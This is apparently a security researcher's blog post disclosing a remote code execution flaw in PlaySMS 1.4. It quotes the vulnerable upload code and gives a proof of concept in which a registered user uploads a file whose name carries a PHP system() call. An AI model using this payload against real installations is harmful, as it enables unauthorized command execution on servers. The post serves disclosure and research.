Skip to content

PlaySMS 1.4 Code Execution in sendfromfile.php

Published by touhid on May 17, 2017

PlaySMS 1.4 allows remote code execution because PHP code in the name of an uploaded .php file is executed. sendfromfile.php has a combination of Unrestricted File Upload and Code Injection.

Unrestricted File Upload:

Any registered user can upload any file because of not proper Validation of file in sendfromfile.

Code Execution using $filename

Now We know sendfromfile.php accept any file extension and just read content not stored in server. But there is bug when user upload example: mybackdoor.php server accept happily. but not store in any folder so our shell is useless. But if User change the file name to “mybackdoor.php” to “<?php system(‘uname -a’); dia();?>.php” .Then server check for file and set some perameter $filename=”<?php system(‘uname -a’); dia();?>.php” . you can see code below and display $filename on page.

Proof of Concept

Login as regular user (created using index.php?app=main&inc=core_auth&route=register):

Go to : http://127.0.0.1/playsms/index.php?app=main&inc=feature_sendfromfile&op=list

 

This is Form.

----------------------------Form for upload CSV file ---------------------- <form action=\"index.php?app=main&inc=feature_sendfromfile&op=upload_confirm\" enctype=\"multipart/form-data\" method=\"post\"> " . _CSRF_FORM_ . " <p>" . _('Please select CSV file') . "</p> <p><input type=\"file\" name=\"fncsv\"></p> <p class=help-block>" . _('CSV file format') . " : " . $info_format . "</p> <p><input type=checkbox name=fncsv_dup value=1 checked> " . _('Prevent duplicates') . "</p> <p><input type=\"submit\" value=\"" . _('Upload file') . "\" class=\"button\"></p> </form> ------------------------------Form ends ---------------------------
-------------PHP code for set parameter ---------------------------       case 'upload_confirm':         $filename = $_FILES['fncsv']['name'];   ------------------------------php code ends ---------------------------
$filename will be visible on page:
----------------------Vulnerable perameter show ----------------------   line 123 : $content .= _('Uploaded file') . ': ' . $filename . '<p />';   ----------------------------------------------------------------------

For Video Demo.

Published inPoC

2 Comments

  2. wallybroky wallybroky

    i am so satisfacted.my english is poor, sorry :). thx for approving my user greetings wally

    # January 21, 2021 Reply

Leave a Reply

Your email address will not be published. Required fields are marked *